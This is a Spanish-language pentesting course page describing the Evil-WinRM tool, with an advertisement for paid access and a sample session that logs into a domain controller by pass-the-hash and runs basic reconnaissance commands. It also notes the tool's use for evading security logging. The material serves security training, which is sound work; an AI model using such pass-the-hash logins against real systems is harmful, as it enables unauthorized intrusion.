Utilizando Evil-WinRm

Para llevar tu aprendizaje al siguiente nivel y practicar estas técnicas de manera segura y efectiva, te invitamos a adquirir acceso premium a nuestro material de curso. No pierdas esta oportunidad de profundizar tus conocimientos. Para más información y adquirir tu acceso, visita nuestro canal de ventas: https://wa.link/ej3kiu. ¡Te esperamos para empezar este viaje juntos!

Evil-WinRM es una herramienta utilizada en la seguridad informática y el pentesting para interactuar con sistemas Windows remotos que tienen habilitado el servicio Windows Remote Management (WinRM). WinRM es el servicio de gestión remota de Microsoft que permite a los usuarios ejecutar comandos Powershell y scripts de manera remota en máquinas de la red.

La herramienta Evil-WinRM fue diseñada específicamente para facilitar el acceso a máquinas que tienen habilitado este servicio y se ha convertido en una opción popular entre los pentesters y actores de amenazas por las siguientes razones:

Características de Evil-WinRM:

Autenticación:
- Permite a los usuarios autenticarse en un host remoto utilizando credenciales de usuario válidas o técnicas como Pass-the-Hash.
Ejecución Remota de Comandos:
- Posibilita la ejecución de comandos y scripts PowerShell en el host remoto, lo que es útil para la exploración y explotación de sistemas vulnerables.
Transferencia de Archivos:
- Incluye funcionalidades para subir y descargar archivos desde y hacia el host remoto, lo cual es vital para la ejecución de herramientas de post-explotación o exfiltración de datos.
Interactividad:
- Provee una shell interactiva que mejora la experiencia del usuario al interactuar con el sistema remoto.
Evasión y Sigilo:
- Puede ser configurada para ejecutar comandos y scripts de manera sigilosa, ayudando a evadir soluciones de seguridad y auditoría de logs.

kali@kali=> evil-winrm -u "spartancybersec.corp\admin" -H 64fbae31cc352fc26af97cbdef151e03 -i 3.14.245.175                                     
Evil-WinRM shell v3.5
                                     
*Evil-WinRM* PS C:\Users\admin\Documents> whoami
spartancybersec\admin

*Evil-WinRM* PS C:\Users\admin\Documents> hostname
First-DC

*Evil-WinRM* PS C:\Users\admin\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : spartancybersec.corp
   Link-local IPv6 Address . . . . . : fe80::dc16:bad5:b35:e9e9%4
   IPv4 Address. . . . . . . . . . . : 10.0.1.100
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.0.1.1

AnteriorIdentificando servicios para realizar el PTH SiguienteUtilizando impacket-psexec

Última actualización hace 1 año